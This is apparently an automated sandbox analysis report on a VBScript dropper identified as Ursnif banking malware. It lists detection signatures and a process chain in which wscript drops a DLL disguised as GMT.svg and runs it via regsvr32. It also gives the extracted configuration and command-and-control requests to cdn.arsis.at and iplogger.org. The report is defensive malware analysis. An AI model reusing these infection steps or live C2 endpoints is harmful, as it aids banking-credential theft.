Loading ...

Play interactive tourEdit tour

Analysis Report description#_63033.vbs

Overview

General Information

Sample Name:description#_63033.vbs
MD5:3c96bf8a25b8555eadd3127ba2fe6e02
SHA1:0bb99baf23f4e0ad75cf60da01085f5e6a086d46
SHA256:eea5debef2bdb29e6c596517aa26b6d39edcac02e161d2730d81dbc66bef4ab5

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates a COM Internet Explorer object
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Regsvr32 Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes or reads registry keys via WMI
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Contains functionality locales information (e.g. system language)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 5204 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • regsvr32.exe (PID: 5464 cmdline: regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5456 cmdline: -s C:\Users\user\AppData\Local\Temp\GMT.svg MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 5752 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4392 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5752 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 4272 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 3472 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4272 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5156 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5992 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5156 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5148 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5504 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5148 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "316", "system": "7a088834846a336e4c3b5e2556ff89a9", "size": "0", "crc": "1", "action": "00000000", "id": "1100", "time": "1592968214", "user": "31b341dd54c8a3b79c4b2eb586cfb939", "hash": "0x00000000", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 5 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Regsvr32 AnomalyShow sources
            Source: Process startedAuthor: Florian Roth: Data: Command: -s C:\Users\user\AppData\Local\Temp\GMT.svg, CommandLine: -s C:\Users\user\AppData\Local\Temp\GMT.svg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5464, ProcessCommandLine: -s C:\Users\user\AppData\Local\Temp\GMT.svg, ProcessId: 5456

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\GMT.svgAvira: detection malicious, Label: HEUR/AGEN.1047219
            Found malware configurationShow sources
            Source: regsvr32.exe.5456.3.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250143", "uptime": "316", "system": "7a088834846a336e4c3b5e2556ff89a9", "size": "0", "crc": "1", "action": "00000000", "id": "1100", "time": "1592968214", "user": "31b341dd54c8a3b79c4b2eb586cfb939", "hash": "0x00000000", "soft": "3"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: cdn.arsis.atVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\GMT.svgVirustotal: Detection: 24%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\GMT.svgReversingLabs: Detection: 48%
            Multi AV Scanner detection for submitted fileShow sources
            Source: description#_63033.vbsVirustotal: Detection: 28%Perma Link
            Source: description#_63033.vbsReversingLabs: Detection: 20%

            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E258E Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,3_2_001E258E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEC12A7 FindFirstFileExA,3_2_6BEC12A7
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking:

            barindex
            Creates a COM Internet Explorer objectShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewIP Address: 88.99.66.31 88.99.66.31
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
            Source: global trafficHTTP traffic detected: GET /api1/pCiPzFstbCpkQ8/TIrAoOyIGtuKu5xCRH1h3/QA3JkiiY_2F06Cp1/BjmCEzGHzcS19cM/RtaHwNb0qQxo31HD8B/WyBjpGZvU/6qm2gFlQJzfLAq9YcGPE/iRPW9xGkJoDsXoZiGFd/rHTh_2BiKgAkAULz4l85x5/QmZiyhGj_2FqU/qnrZh_2B/Z61VmMhexWvGi_2Blho2ekM/Y5_2FtJhhA/nZNrxn1hy4RLoqwr1/CAAcH4SOwVWq/m_2ByN5G8tw/m9aLf1n0UIiKLc/SY0f_0A_0DPJ9DbIe0gBS/_2Fmx_2B2o9ygsaH/W9G_2FnHS4PZpKF/ppekxAfzDt7_2BMMsJ/eMNlr77lNzjegi_2F/x HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/LLex4_2FwVx5cugO/n3OGkDZ90rNlnmK/NK2hclnVmGlSN0HRtM/Dq4EirByR/0dKXlLez17EFg7rVeGjD/q6FC07kjcPHgU0bfnsM/e4lbJaMZHng10ZZKx79UVY/XGa7AzX8rWqH0/QUkuJKgG/IBPqzhs5gzL9yu7oa108yFs/BHTM32XLyG/FGdFosTHK_2FB5T_2/FLugq_2FdOeX/4cadEWZpJTt/Tlk910_2BQ9jOr/s4sGYa0Qwz4yxJ20fDG3_/2BdGREKE5ZTWKKdK/_0A_0Dp1DF_2BU9/_2Fhye5Q_2FcV86d0z/uZonvJVBg/Aq_2BYp_2BSL76e_2Bgh/eDgNE3mdPpty090Go1s/zSAXt HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/OOTq55LgPF0lV/NWLm9usy/r9pBPGN0cyr_2FnKSW11TGD/p_2Bqq5xzp/bqt65HWOw5uwz3XYy/daVmrfViFuKV/aL_2FunD9AH/sTYB_2BP5uqUMf/XMYtIbjUiqeDNmyKEniWO/4w6SGU_2B2sS6kvy/T8k88aiA8HFWwyQ/fKHJ_2FP1GKD_2BvmX/tcB6rMWle/QiGS1_2Fx_2FqHi7KlH6/hFnwvqkFyCxNF43D97u/BvprqgTBoDscOWEgSh_2BI/sj7Jbny2sgnxc/8wV8c5Tp/fnu_0A_0D9ikOxUPwsOuGM7/_2FnSJOOqX/TReLTOVqlt9iemKMX/0l1e_2B3Rklf/n2lCnAAWbpkKOeP/8YIa HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/pU3aiHxRLfRNi0Z8e/yIC3OOTyW_2F/cI2WGvRE0LH/ANN_2FLHh52Cf7/inEFf06IedP8CO5UnACKb/5YDEhlC6l1Kof81q/OX9O_2FZp1IZodx/i_2BYnByoNoZ_2B3p2/OuPAcR1bY/RuIEAxMDCO8AIwK_2B6P/UE_2Fwko_2BAWLfGCWL/jSUQofLZ_2BSojwc5JqOcY/_2FSTtjByfZop/5mLVpw5Z/HKE9wwmCiUkcp5Zj0Cz_2Bb/nn9wwdmosx/6h3xU2aYoPydAlgPc/Vix3Mm2WT_0A/_0DnWsGULFN/pqJd0_2FFMdQr1/eMHo6LK1u4bp3ZaUfzKti/l4nX9h9fvslQT_2B/A9gAe2do9P/vVh HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: cdn.arsis.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /api1/cp14uOrShOCqrIBvaJwoU7/C1FlExG7vaQoO/oJRqPiaa/5WhdZJLO4jSCA4RcPHoQChu/5GbtwiDumo/CG8Pe9vhOq3ffG_2B/EI1RQr2sA7kJ/TY_2FG_2FOJ/M7eR0stTroiUgG/EHlfgNAc1FZcB0jl13lib/70jQVFO_2FxbMItS/VuyvCLu7S0oGHKq/83w4CudEKbc9z_2FZ5/nI6sLfNtc/I6kCYLmX6FK_2Fu9ElCv/m7BDddNu2xMzZoIYECV/2FK4pTSvhlMnL7UF_0A_0D/sAC3l2Bl4CeAL/6QqGO4YS/8JlJVKgQNUmPGo0Qk83PTki/dgeVrDhA6f/glYwm_2Fd/hfxXCEn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/pPmVDApf9Jk/ZOcPpY_2BcGOxp/O5_2FCNO_2BefOehBweDN/S_2BPozG8s5mPJP_/2F0L5Qd5lD4tI_2/BedNyMiB06sLGBPcAo/gOuddF4kG/1WNaC8U_2FZHNmMZd_2B/t6pptm3Vi1ckxmvPxXl/E_2BlM2AwjD_2Fnt0394Uk/yRATaCV4V5ZkP/G3HwAyhV/z2uJmfq7RM8_2BOt3lrYBQk/HVFD9NqJl3/C4YbNfngw6uFsyjaJ/8ibqwmrYbnIc/A2gcb_2Faij/qjBinzNjDFq74v/KlX_0A_0DyAmOWez70jue/jW2FDMGv0ol7wr_2/Fs6kqB3iEDyxOjopoCH/Ww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: global trafficHTTP traffic detected: GET /api1/BGWoEYk29tf8z2q4/qZfME9SHMNsMIpo/oUVtIl6wj30znXE8rD/U2gcm5wkB/dr7Yo05FxjRu2AyzvKHP/wNep0VHmd8s6GmfWJYR/EmPV_2FGDMJ_2BT1LoC68y/FEXkzEamk_2B2/ZfPHdzVG/zLuaszOmxb8v2lW6EHY2vim/Jdbbnr6s7L/30uod05uuwDsFyCEL/NBaFHAMs3phn/UuABi7i4VTd/YpYqqq68Dj9xo7/5_2Fk3ohiQasHWrBLtnuw/gOB1FOdA_2B881_0/A_0D6acn5JmzFTf/T4rprrvPyIPDIr_2Fm/SY8fTTRhR/L7r7d8if3yJ62n7xjgPK/EjuZYJ2Fz5_2F/l HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:76.0) Gecko/20100101 Firefox/76.0Host: cdn.arsis.at
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x110b320f,0x01d649d5</date><accdate>0x110b320f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x110b320f,0x01d649d5</date><accdate>0x110b320f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1115fead,0x01d649d5</date><accdate>0x1115fead,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1115fead,0x01d649d5</date><accdate>0x1117576f,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x111b657b,0x01d649d5</date><accdate>0x111b657b,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.11.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x111b657b,0x01d649d5</date><accdate>0x111b657b,0x01d649d5</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: iplogger.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Jun 2020 18:10:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 c4 93 53 f3 4a 52 8b ec 6c 32 0c d1 4d 00 8a d8 e8 43 a5 41 76 01 15 41 79 79 e9 99 79 15 c8 72 fa 20 d3 c1 0c a8 cb 00 90 3b 34 31 a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T*$'*gd*SJRl2MCAvAyyyr ;410
            Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: regsvr32.exe, 00000003.00000002.1725480766.0000000000598000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/94
            Source: regsvr32.exe, 00000003.00000003.1654577172.0000000000596000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/EL
            Source: regsvr32.exe, 00000003.00000003.1662648058.000000000059B000.00000004.00000001.sdmpString found in binary or memory: http://cdn.arsis.at/api1/BGWoEYk29tf8z2q4/qZfME9SHMNsMIpo/oUVtIl6wj30znXE8rD/U2gcm5wkB/dr7Yo05FxjRu2
            Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
            Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
            Source: wscript.exe, 00000000.00000002.948181155.000001FCBBB0D000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
            Source: msapplication.xml.11.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.11.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.11.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.11.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.11.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.11.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.11.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.11.drString found in binary or memory: http://www.youtube.com/
            Source: wscript.exe, 00000000.00000003.834965257.000001FCBBB32000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/
            Source: wscript.exe, 00000000.00000003.800827213.000001FCB8611000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bD467
            Source: wscript.exe, 00000000.00000003.833445263.000001FCB5819000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.921958922.000001FCB9565000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.858717915.000001FCB862E000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.946555898.000001FCB9663000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.936125270.000001FCB8629000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467
            Source: wscript.exe, 00000000.00000003.921958922.000001FCB9565000.00000004.00000001.sdmpString found in binary or memory: https://iplogger.org/1bP467tem
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000003.00000002.1728769965.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1102940599.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103658139.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103779305.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103257055.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103947110.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103515651.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103866848.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000003.1103987021.0000000004CF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5456, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA15F3 NtMapViewOfSection,3_2_6BEA15F3
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA18DB NtCreateSection,memset,3_2_6BEA18DB
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA2775 NtQueryVirtualMemory,3_2_6BEA2775
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E3A67 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_001E3A67
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001EAEB5 NtQueryVirtualMemory,3_2_001EAEB5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEA25543_2_6BEA2554
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001EAC943_2_001EAC94
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E15D63_2_001E15D6
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEBAB783_2_6BEBAB78
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_6BEC63213_2_6BEC6321
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\GMT.svg 18D16E00C1AEC23905194CAA6929EFD4AF4A8613CFEC674E0752033A891B7C33
            Source: description#_63033.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: GMT.svg.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.bank.troj.evad.winVBS@16/19@9/2
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: description#_63033.vbsVirustotal: Detection: 28%
            Source: description#_63033.vbsReversingLabs: Detection: 20%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\description#_63033.vbs'
            Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\Users\user\AppData\Local\Temp\GMT.svg
            Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\GMT.svg
